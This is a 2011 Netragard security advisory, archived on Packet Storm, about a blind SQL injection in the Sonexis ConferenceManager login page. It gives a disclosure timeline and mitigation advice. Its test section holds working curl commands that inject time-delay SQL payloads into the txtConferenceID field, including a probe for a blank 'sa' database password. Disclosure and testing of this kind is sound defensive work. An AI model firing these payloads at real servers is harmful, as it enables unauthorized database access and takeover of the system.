exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sonexis ConferenceManager Blind SQL Injection

Sonexis ConferenceManager Blind SQL Injection
Posted Apr 10, 2011
Authored by Adriel T. Desautels, Netragard | Site netragard.com

Netragard, L.L.C Advisory - Sonexis ConferenceManager version suffers from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 1f9f92a63ad712d5bdad484011567b4dc9edf18843008ce146b3c460e4a79e40

Sonexis ConferenceManager Blind SQL Injection

Change Mirror Download
*************************** NETRAGARD ADVISORY ************************
Research Driven Penetration Testing

If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated. The advisory can be found on the
Netragard website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com

[Advisory Information]
Contact : Adriel T. Desautels
Advisory ID : NETRAGARD-20110910 (Corrected)
Researcher : Kevin Finisterre & Team
Product Name : Sonexis ConferenceManager
Product Version : (Tested On)
Vendor Name : Sonexix Technology, Inc.
Type of Vulnerability : Blind SQL Injection
Impact : Critical
Date Discovered : 01/19/2011
Vendor Notified : 01/26/2011

[Notes About This Advisory]
Netragard's team discovered and exploited this vulnerability on January
19th 2011 during the delivery of research based penetration testing services.
Netragard notified the vendor about this vulnerability on January 26th 2011.
Netragard did not receive any communications back from Sonexis after initial

According to an advisory published by Solutionary, Solutionary discovered
this same vulnerability on 01/27/2011. Solutionary notified Sonexis
of the vulnerability on 02/18/2011 and received a vendor response back on
03/02/2011. Solutionary published a low detail advisory for this issue on

It is Netragard's policy to refrain from publishing vulnerabilities
until after methods for remediation have been created/provided. Exceptions
to this policy are made in the event that vendors are non-responsive or in
the event that the vulnerability becomes public knowledge.

[Product Description]
"The Sonexis ConferenceManager offers unbeatable value. Our high-quality
audio platform is recognized for its ease-of-use, security, and
cost-effectiveness — and it offers a comprehensive set of integrated Web
conferencing capabilities. Better still, our unique architecture allows you
unlimited flexibility. You're never more than a license key away from
increasing users, adding Web functionality, or changing from one protocol
to another. Simply put, it's the best thing to happen to conferencing."

Taken From:

[Technical Summary]
The Sonexis ConferenceManager does not adhere to best practices as defined
by the Open Web Application Security Project (OWASP), the de facto standard
for Web Application Security. Specifically, the Sonexis ConferenceManager
fails the OWASP Data Validation Criterion as well as others that are not
discussed in this advisory.

This advisory discloses details about a Blind SQL Injection vulnerability
that was discovered by Netragard during the delivery of research driven
penetration testing services. Successful exploitation of this
vulnerability enables the attacker to take full control of the affected
system. Netragard has created and will provide Proof of Concept code for
this vulnerability shortly after the publication of this Advisory.

Netragard has not received any information from the vendor since initial
notification. As of the time of the authoring of this Advisory no official
vendor patches have been made public. Netragard has provided methods for
mitigation in this advisory.

For more information about OWASP criterion please visit the URL Below:

--> https://www.owasp.org/index.php/Category:Vulnerability <--

[Technical Details]
The tests shown below can be used to determine if your Sonexis
ConferenceManager is vulnerable.

Test Environment:
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000

--- TEST 1 ---
Validated SQL command execution with the "wait+for+delay+'0:0:3'--" SQL
command. If command execution is a success then time should return a
"real" value of roughly 3 seconds.

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:3'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real 0m3.281s <--- Command Execution Successful!
user 0m0.000s
sys 0m0.004s
--- END TEST 1 ---

--- TEST 2 ---
Validated SQL command execution with the "wait+for+delay+'0:0:5'--" SQL
command. If command execution is a success then time should return a
"real" value of roughly 5 seconds.

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:5'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real 0m5.277s <--- Command Execution Successful!
user 0m0.001s
sys 0m0.003s
--- END TEST 2 ---

--- TEST 3 ---
Validated SQL command execution with the "waitfor+delay+'0:0:10'--" SQL
command. If command execution is a success then time should return a
"real" value of roughly 10 seconds.

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:10'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real 0m10.280s <--- Command Execution Successful!
user 0m0.002s
sys 0m0.004s
--- END TEST 3 ---

--- TEST 4 ---
This test is an example of how to check for a blank "sa" password in the
MsSQL Database. If the password is set then there will be no delay in
server response. If the password is not set, then there will be a 10
second delay.

netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--"
"http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real 0m0.305s <-- Password is set (no delay).
user 0m0.003s
sys 0m0.001s

netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--"
"http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real 0m10.101s <-- Password is not set (delay).
user 0m0.002s
sys 0m0.003s
--- END TEST 4 ---

Exploitation Difficulty : Trivial
Risk : Complete System Compromise, Distributed
Metastasis, Access To Sensitive Data, etc.

[Proof Of Concept]
Netragard created a Proof of Concept exploit for this vulnerability that
will be published on Netragard's website shortly after the release of
this advisory.

[Vendor Status and Chronology]

01/19/2011 - Vulnerability Discovered and Exploited by Netragard, LLC.
01/26/2011 - Vendor Notified of the Vulnerability by Netragard, LLC.
01/27/2011 - Vulnerability Discovered by Solutionary.
02/18/2011 - Vendor Notified of the Vulnerability by Solutionary.
03/02/2011 - Vendor Responds to Solutionary.
04/06/2011 - Solutionary publishes a low detail advisory with no mitigation.
04/10/2011 - Netragard publishes high detail advisory with mitigation.

This vulnerability can be mitigated by filtering application requests with
a Web Application Firewall.

Further mitigation can be accomplished with custom filtering done through the
Web Server configuration.

Note: Mitigation does not constitute a proper fix. If an attacker is able
to circumvent mitigation techniques then exploitation is still possible.
An example of Web Application Firewall subversion can be found at the
following URL: http://pentest.netragard.com/?p=10

Vendor must perform a review of the Sonexis ConferenceManager source code
and ensure that it adheres to the OWASP criterion.

Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit

Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    8 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    17 Files
  • 26
    Sep 26th
    3 Files
  • 27
    Sep 27th
    13 Files
  • 28
    Sep 28th
    5 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By